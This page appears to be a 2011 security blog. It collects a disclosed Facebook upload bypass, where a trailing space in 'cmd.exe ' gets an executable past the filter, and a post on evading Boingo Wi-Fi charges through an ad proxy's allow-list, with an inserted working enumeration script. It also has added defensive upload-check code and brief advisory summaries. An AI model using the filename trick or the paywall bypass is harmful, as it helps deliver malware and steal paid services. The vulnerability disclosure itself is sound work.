October 27, 2011

Facebook Attach EXE Vulnerability

----------------------------------------------------------------------------------------------------------------------------------------
1. Summary:

When using the Facebook 'Messages' tab, there is a feature to attach a file. Used normally, the site will not allow a user to attach an executable file. A bug was discovered that subverts this security mechanism. Note that you do NOT have to be friends with a user to send them a message with an attachment.

----------------------------------------------------------------------------------------------------------------------------------------
2. Description:

When attaching an executable file, Facebook will return an error message stating:

"Error Uploading: You cannot attach files of that type."

When uploading a file attachment to Facebook, we captured the web browser's POST request to the web server. Inside this POST request is the line:

Content-Disposition: form-data; name="attachment"; filename="cmd.exe"

It was discovered that the 'filename' parameter was being parsed to determine whether the file type is allowed or not.

To subvert the security mechanism and allow an .exe file type, we modified the POST request by appending a space to the filename value, like so:

filename="cmd.exe "

This was enough to trick the parser and allow our executable file to be attached and sent in a message.
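
The behaviour above, as an added example rather than Facebook's code: a minimal multipart parser pulls the filename out of the Content-Disposition header exactly as sent, a naive extension check reproduces the bypass (it compares the raw extension, so "exe " is not "exe"), and a hardened check normalises the name before deciding and sniffs the content for the PE "MZ" magic. The block-list contents, the sample POST body and the magic-byte check are assumptions made for the example.

```python
import re

# Added example, not Facebook's code: the post describes an attachment filter
# that rejected "cmd.exe" but accepted "cmd.exe " (trailing space).  A naive
# check reproducing that behaviour sits beside a hardened one.  The block-list,
# the 'MZ' magic check and the sample POST body are constructed for this example.

BLOCKED_EXTENSIONS = {"exe", "com", "scr", "bat", "cmd", "pif", "msi", "vbs", "js"}
PE_MAGIC = b"MZ"  # first two bytes of every Windows PE executable

_DISPOSITION_RE = re.compile(
    rb'Content-Disposition:\s*form-data;[^\r\n]*?filename="([^"]*)"', re.IGNORECASE
)


def parse_multipart(body: bytes, boundary: bytes):
    """Return [(raw_filename, payload)] for the file parts of a multipart/form-data body.

    Deliberately minimal (no nested multiparts, no quoted-string escapes); enough to
    show that the filename is taken verbatim from the Content-Disposition header.
    """
    parts = []
    for chunk in body.split(b"--" + boundary)[1:]:
        if chunk.startswith(b"--"):        # closing delimiter "--boundary--"
            break
        head, _, payload = chunk.partition(b"\r\n\r\n")
        if payload.endswith(b"\r\n"):      # CRLF that precedes the next delimiter
            payload = payload[:-2]
        m = _DISPOSITION_RE.search(head)
        if m:
            parts.append((m.group(1).decode("latin-1"), payload))
    return parts


def naive_is_allowed(filename: str) -> bool:
    """The flawed check: looks only at the raw extension.
    'cmd.exe ' has extension 'exe ', which is not in the set, so it passes."""
    _, dot, ext = filename.rpartition(".")
    return not dot or ext.lower() not in BLOCKED_EXTENSIONS


def normalize_filename(raw: str) -> str:
    """Canonicalise a user-supplied filename before any policy decision."""
    name = raw.replace("\\", "/").rsplit("/", 1)[-1]      # basename, either separator
    name = "".join(ch for ch in name if ch.isprintable())  # drop NUL, control chars,
                                                           # non-ASCII whitespace
    return name.strip(" \t.").lower()   # Windows ignores trailing spaces and dots


def hardened_is_allowed(raw_filename: str, payload: bytes) -> bool:
    """Normalise the name, reject any blocked extension in the chain, then confirm
    with content sniffing so a renamed binary is still rejected."""
    name = normalize_filename(raw_filename)
    if not name or "." not in name:
        return False                                   # no usable extension: reject
    if any(ext in BLOCKED_EXTENSIONS for ext in name.split(".")[1:]):
        return False                                   # e.g. "setup.exe.txt"
    if payload.startswith(PE_MAGIC):
        return False                                   # extension lies about content
    return True


# Constructed sample: the request the post describes, with the trailing space.
BOUNDARY = b"----FormBoundaryExample"
SAMPLE_POST_BODY = (
    b"------FormBoundaryExample\r\n"
    b'Content-Disposition: form-data; name="attachment"; filename="cmd.exe "\r\n'
    b"Content-Type: application/octet-stream\r\n"
    b"\r\n"
    b"MZ\x90\x00\x03\x00\x00\x00\x04\x00"        # first bytes of a PE header (constructed)
    b"\r\n"
    b"------FormBoundaryExample--\r\n"
)


def check_upload(body: bytes, boundary: bytes):
    """Run both checks over every file part; returns [(raw_name, naive, hardened)]."""
    return [(raw, naive_is_allowed(raw), hardened_is_allowed(raw, data))
            for raw, data in parse_multipart(body, boundary)]


if __name__ == "__main__":
    for raw, naive, hardened in check_upload(SAMPLE_POST_BODY, BOUNDARY):
        print(f"filename={raw!r}  naive_allows={naive}  hardened_allows={hardened}")
```

The hardened check deliberately decides on the normalised name and then distrusts it anyway: a server that only fixes the trailing-space case is still one character class (trailing dot, NUL, Unicode whitespace) away from the same bypass, whereas the magic-byte check catches the executable regardless of what the client called it.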

----------------------------------------------------------------------------------------------------------------------------------------
3. Impact:

Potentially allows an attacker to compromise a victim's computer system.

----------------------------------------------------------------------------------------------------------------------------------------
4. Affected Products:

www.facebook.com

----------------------------------------------------------------------------------------------------------------------------------------
5. Time Table:

09/30/2011 Reported Vulnerability to the Vendor
10/26/2011 Vendor Acknowledged Vulnerability
10/27/2011 Publicly Disclosed
11/01/2011 Vulnerability Fixed

----------------------------------------------------------------------------------------------------------------------------------------
6. Credits:

Discovered by Nathan Power
www.securitypentest.com

----------------------------------------------------------------------------------------------------------------------------------------

July 23, 2011

DEFCON Travelers.. Don't just go. Boingo (for free)

While recently traveling, I noticed that several airports I visited had a hotspot named "boingo". Boingo claims to be a worldwide leader in Wi-Fi services; they provide wireless internet access for a fee. In this article I'm going to discuss the steps I took to avoid paying for Boingo internet access.

The "boingo" hotspot is "open" and anyone can connect to it. When I connected to it, I received a DHCP lease. I launched my web browser, and when I attempted to go to google.com I was redirected to a Boingo web page suggesting I pay to use the internet.

The Boingo web page seemed to have quite a bit of functionality. One thing in particular I noticed was the advertisements. When I looked at the source of an ad, I saw that it pointed to the advertiser's server on the internet. Going through the source of the page, I discovered that the following URL was being used to relay requests for advertisers through the network via a proxy:

http://ads.jiwire.com/JOS.aspx?http/h71028.www7.hp.com/enterprise/us/en/ipg/business-printing-solutions.html?jumpid=ex_r2548_go/printingandimaging

If I could use this proxy to get to google.com, that would solve all my problems. Things aren't always that easy, though. I entered http://ads.jiwire.com/JOS.aspx?http/www.google.com/ into my browser and got an error stating that the domain was not in the "white list".

Now that I knew the system was using a white list, it was just a matter of brute forcing domains to find which ones were allowed.

Below is a list of domains I found by manually brute forcing:
  • mobileproxy.org
  • www.att.com
  • www.bing.com
  • www.blockbuster.com
  • www.chrysler.com
  • www.dell.com
  • www.ford.com
  • www.hp.com
  • www.htc.com
  • www.itunes.com
  • www.java.com
  • www.netflix.com
  • www.oracle.com
  • www.t-mobile.com
  • www.skype.com
  • www.sprint.com
  • www.wordpress.com
To my shock, a proxy service, mobileproxy.org, was in the white list. By using mobileproxy.org to relay my traffic through the ads.jiwire.com proxy, I was able to reach google.com!

A white list is never a perfect security solution; it just filters content, and in this case we were able to abuse that. Even if the mobileproxy.org service that relayed our requests had not been reachable, there is always the potential for open-redirect type issues within any of the advertisers' domains. It would just be a matter of finding them. Enjoy!
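
An added example, not Boingo's or JiWire's code, of the enumeration step described above: build the JOS.aspx forwarder URL for each candidate host, fetch it, and classify the response by whether the "white list" denial page came back. The forwarder URL shape and the denial wording are taken from this post; the exact denial text, the User-Agent header and the offline stand-in portal (demo_fetch) are assumptions, and the candidate list is a subset of the domains listed above.

```python
from typing import Callable, Dict, Iterable
from urllib.error import HTTPError, URLError
from urllib.request import Request, urlopen

# Added example, not Boingo's or JiWire's code.  The forwarder URL shape
# (JOS.aspx?http/<host>/<path>) and the "white list" denial wording come from
# the post; the transport is injectable so the classification logic can run
# without network access.

FORWARDER = "http://ads.jiwire.com/JOS.aspx?http/{host}/"
DENIAL_MARKER = "white list"   # assumed: phrase in the denial page, per the post


def forward_url(host: str) -> str:
    """URL that asks the ad proxy to relay a request for `host`."""
    return FORWARDER.format(host=host)


def classify(body: str) -> str:
    """'denied' if the allow-list error page came back, 'relayed' if some other
    content did, 'error' if nothing usable was returned."""
    if not body:
        return "error"
    return "denied" if DENIAL_MARKER in body.lower() else "relayed"


def http_fetch(url: str, timeout: float = 10.0) -> str:
    """Live transport: fetch through the captive portal, keeping error bodies."""
    req = Request(url, headers={"User-Agent": "Mozilla/5.0"})   # assumed UA
    try:
        with urlopen(req, timeout=timeout) as resp:
            return resp.read(65536).decode("utf-8", "replace")
    except HTTPError as exc:             # 4xx/5xx still carries the portal's page
        return exc.read(65536).decode("utf-8", "replace")
    except URLError:
        return ""


def enumerate_allowlist(candidates: Iterable[str],
                        fetch: Callable[[str], str] = http_fetch) -> Dict[str, str]:
    """Map each candidate host to 'relayed' / 'denied' / 'error'."""
    return {host: classify(fetch(forward_url(host))) for host in candidates}


# Offline stand-in for the portal, constructed for this example: it relays only
# a few of the hosts the post found and returns the denial page for everything else.
_DEMO_ALLOWED = {"www.hp.com", "www.dell.com", "mobileproxy.org"}


def demo_fetch(url: str) -> str:
    host = url.split("JOS.aspx?http/", 1)[1].split("/", 1)[0]
    if host in _DEMO_ALLOWED:
        return f"<html><body>relayed content for {host}</body></html>"
    return "<html><body>This domain is not in the white list.</body></html>"


CANDIDATES = ["www.google.com", "www.hp.com", "www.dell.com", "mobileproxy.org"]

if __name__ == "__main__":
    # Swap demo_fetch for http_fetch to run this against a real portal.
    for host, verdict in enumerate_allowlist(CANDIDATES, fetch=demo_fetch).items():
        print(f"{host:20s} {verdict}")
```

The classifier keys on the denial page rather than on HTTP status because captive portals commonly answer 200 for both outcomes; a third "error" verdict keeps a timeout or reset from being misread as a relayed host.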

June 1, 2011

Multi-Tech Systems XSS POC

Multi-Tech Systems "MultiModem iSMS" Multiple XSS Vulnerabilities

1. Summary:

The Multi-Tech Systems "MultiModem iSMS" appliance is affected by multiple XSS (cross-site scripting) vulnerabilities. The product is designed to give low-bandwidth applications the ability to send information via reliable, affordable SMS text messages.

April 25, 2011

Trustwave WebDefend Privilege Escalation Vulnerability

1. Summary:

A privilege escalation vulnerability has been identified in Trustwave's WebDefend Enterprise product.  It is possible for the restricted operator account to gain access as root on the appliance.

WebDefend Privilege Escalation POC

March 25, 2011

Unidesk ReportingService Forceful Browsing Vulnerability

1. Summary:

The Unidesk management appliance is prone to a forceful browsing vulnerability that allows an attacker access to administrator resources.

February 27, 2011

Facebook URL Redirect Vulnerability

1. Summary:

Once a victim clicks a specially crafted Facebook URL, they can be redirected to a malicious website.